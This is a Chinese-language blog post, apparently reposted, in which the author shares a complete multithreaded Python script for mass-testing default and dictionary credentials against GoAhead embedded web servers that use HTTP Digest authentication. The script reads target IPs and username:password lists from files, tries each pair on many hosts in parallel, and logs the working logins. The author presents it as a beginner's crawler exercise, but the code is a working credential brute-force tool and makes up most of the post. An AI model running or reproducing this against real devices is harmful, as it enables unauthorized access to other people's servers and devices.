批量检测GoAhead系列服务器中Digest认证方式的服…

2018-06-18 01:07:34来源:未知 阅读 ()

新老客户大回馈,云服务器低至5折

  最近在学习用python写爬虫工具,某天偶然发现GoAhead系列服务器的登录方式跟大多数网站不一样,不是采用POST等方法,通过查找资料发现GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的嵌入式Web Server。大多数GoAhead服务器采用了HTTP Digest认证方式,并且部分服务器采用了默认账号密码,于是萌生了针对GoAhead编写爬虫的想法,通过近8个小时的编程与调试,勉强写出了个简陋的脚本,现在拿出来分享,给刚接触python的新手参考下,也请求路过的大神指点下,哈哈。

  该脚本对新手来说难点在于如何让python自动填写账号密码并登录,本人花了近两个小时参考了很多网站,觉得用python的第三方模块requests中的get()函数最方便,只需填写URL、认证方式和账号密码即可模拟登录。

  另一个难点就是多线程了,不过对于用其它语言写过多线程的人来说还是挺容易的,不懂的可以自己查资料,这里就不多说了。

  下面附上完整代码:

from requests.auth import HTTPDigestAuth
import requests
import threading
import sys
import os
import time


ip_file_name = 'ip.txt'
password_file_name = 'password.txt'
results_file_name = 'results.txt'
ip_count = 0
thread_count = 0
default_thread_count = 150
local = threading.local()

#read ip_file
def get_ip():
    if os.path.exists(os.getcwd() + '/' + ip_file_name):
        with open(ip_file_name, 'r') as r:
            list = []
            for line in r.readlines():
                line = line.strip('\n')
                line = 'http://' + line
                list.append(line)
            r.close()
            return list
    else:
        print('ip file doesn\'t exist!\n')
        os._exit(-1)

#read password_file
def get_password():
    if os.path.exists(os.getcwd() + '/' + password_file_name):
        with open(password_file_name, 'r') as pa:
            list = []
            for line in pa.readlines():
                line = line.strip('\n')
                list.append(line)
            pa.close()
        return list
    else:
        print('password file doesn\'t exist!\n')
        os._exit(-1)

class MyThread(threading.Thread):
    def __init__(self, thread_index, ip_list, pass_list, results_file):
        threading.Thread.__init__(self)
        self.thread_index = thread_index
        self.ip_list = ip_list
        self.pass_list = pass_list
        self.results_file = results_file
    
    def run(self):
        local.thread_index = self.thread_index
        #Calculate the number of tasks assigned.
        if ip_count <= default_thread_count:
            local.my_number = 1
        else:
            local.my_number = (int)(ip_count/thread_count)
            if ip_count%thread_count > thread_index:
                local.my_number = local.my_number + 1
        
        for local.times in range(local.my_number):
            try:
                local.ip = self.ip_list[(local.times-1)*thread_count+local.thread_index]
                #Check whether the target is a digest authentication.
                local.headers = str(requests.get(local.ip, timeout=6).headers)
                if 'Digest' not in local.headers:
                    continue
            except BaseException:
                '''
                e = sys.exc_info()
                print(e)
                '''
                continue
            #Loop to submit account password.
            for local.user in self.pass_list:
                #sleep 0.1 second to prevent overloading of target
                time.sleep(0.1)
                #Get the account password by cutting local.user
                local.colon_index = local.user.find(':')
                if local.colon_index == -1:
                    print(local.user+' doesn\'t Conform to the specifications')
                    os._exit(1)
                local.username = local.user[0:local.colon_index]
                local.password = local.user[local.colon_index+1:]
                if local.password == '<empty>':
                    local.password = ''
                try:
                    local.timeouts = 0
                    #Start Digest authentication
                    local.code = requests.get( local.ip, auth=HTTPDigestAuth(local.username, local.password), timeout=5 )
                    #If the status code is 200,the login is success 
                    if local.code.status_code == 200 :
                        print('login '+local.ip+' success!')
                        self.results_file.writelines(local.ip+' '+local.username+' '+local.password+'\n')
                        break
                except BaseException:
                        '''
                        e = sys.exc_info()
                        print(str(local.thread_index)+' '+local.ip+' '+local.username+' '+local.password)
                        print(e)
                        '''
                        #If the times of timeout is too many, check the next IP.
                        local.timeouts += 1
                        if local.timeouts == 15:
                            local.timeouts = 0
                            break
                        else:
                            continue

if __name__ == '__main__':
    
    ip_list = get_ip()
    pass_list = get_password()
    
    if len(ip_list)==0 or len(pass_list)==0:
        print('please fill ip, username or password file')
        os._exit(-1)
    
    ip_count = len(ip_list)
    if ip_count <= default_thread_count:
        thread_count = ip_count
    else:
        thread_count = default_thread_count
    
    print('start to work...')
    #create threads and run
    threads = []
    with open(results_file_name, mode='a') as results_file:
        for thread_index in range(thread_count):
            thread = MyThread(thread_index, ip_list, pass_list, results_file)
            thread.start()
            threads.append(thread)
        for thread in threads:
            #wait for all threads to end
            thread.join()
        results_file.close()
    
    print('All work has been completed.')

  该脚本的运行流程为:

  1.读取ip.txt、password.txt文件中的内容

  2.创建线程并运行

  3.每个线程对其分配到的IP进行循环认证,先检查目标是否存在且为Digest认证方式,若为真则开始循环登录,登录过程中若多次超时则跳过对该IP的检查

  4.当服务器返回200状态码时则表示登录成功,将IP和账号密码写入results.txt,并循环检查下一个IP

  5.当所有线程将分配到的所有IP检查完毕,则程序运行完毕

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:6.5、装饰器的类型

下一篇:encode()、decode()字符编码问题